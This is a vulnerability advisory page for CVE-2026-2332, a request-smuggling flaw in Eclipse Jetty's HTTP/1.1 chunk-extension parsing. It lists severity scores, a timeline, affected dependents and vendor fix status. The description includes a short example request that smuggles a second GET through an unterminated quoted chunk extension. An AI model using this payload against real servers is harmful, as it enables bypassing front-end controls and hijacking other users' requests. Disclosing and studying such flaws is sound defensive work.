Skip to main content

Eclipse Jetty EUVDEUVD-2026-22243

| CVE-2026-2332 CRITICAL
HTTP Request/Response Smuggling (CWE-444)
2026-04-14 eclipse GHSA-355h-qmc2-wpwf
9.1
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
vuln.today AI
8.7 HIGH

Network, unauthenticated, no UI, but realistic exploitation needs a parsing-divergent front-end (AC:H); smuggling crosses a trust boundary into a separate component (S:C) with high confidentiality/integrity impact and no availability impact.

3.1 AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
4.0 AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
SUSE
7.4 HIGH
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Red Hat
7.4 HIGH
qualitative

Primary rating from NVD.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

13
Analysis Updated
Jun 30, 2026 - 03:49 vuln.today
v5 (cvss_changed)
Source Code Evidence Fetched
Jun 30, 2026 - 03:46 vuln.today
Analysis Updated
Jun 30, 2026 - 03:46 vuln.today
v4 (cvss_changed)
Analysis Updated
Jun 30, 2026 - 03:46 vuln.today
v3 (cvss_changed)
Analysis Updated
Jun 30, 2026 - 03:46 vuln.today
v2 (cvss_changed)
Severity Changed
Jun 30, 2026 - 03:24 NVD
HIGH CRITICAL
CVSS changed
Jun 30, 2026 - 03:24 NVD
7.4 (HIGH) 9.1 (CRITICAL)
Re-analysis Queued
Apr 17, 2026 - 15:37 vuln.today
cvss_changed
Patch released
Apr 15, 2026 - 02:30 nvd
Patch available
Analysis Generated
Apr 14, 2026 - 12:14 vuln.today
EUVD ID Assigned
Apr 14, 2026 - 11:30 euvd
EUVD-2026-22243
Analysis Generated
Apr 14, 2026 - 11:30 vuln.today
CVE Published
Apr 14, 2026 - 10:59 nvd
HIGH 7.4

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 243 maven packages depend on org.eclipse.jetty:jetty-http (25 direct, 218 indirect)

Ecosystem-wide dependent count for version 12.1.0.

DescriptionNVD

In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here:

  • https://w4ke.info/2025/06/18/funky-chunks.html
  • https://w4ke.info/2025/10/29/funky-chunks-2.html

Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.

POST / HTTP/1.1 Host: localhost Transfer-Encoding: chunked

1;ext="val X 0

GET /smuggled HTTP/1.1 ...

Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.

AnalysisAI

HTTP request smuggling in Eclipse Jetty's HTTP/1.1 parser lets remote unauthenticated attackers desynchronize front-end/back-end request boundaries by abusing quoted-string chunk extensions. Jetty incorrectly terminates chunk-extension parsing at a CRLF located inside an unterminated quoted-string (e.g. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Recommended ActionAI

Within 24 hours: inventory all systems running Eclipse Jetty and identify internet-exposed instances. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Vendor StatusVendor

SUSE

Severity: High
Product Status
SUSE Linux Enterprise Desktop 15 SP7 Fixed
SUSE Linux Enterprise High Performance Computing 15 SP7 Fixed
SUSE Linux Enterprise Module for Development Tools 15 SP7 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP7 Fixed
SUSE Linux Enterprise Server 15 SP7 Fixed

Share

EUVD-2026-22243 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy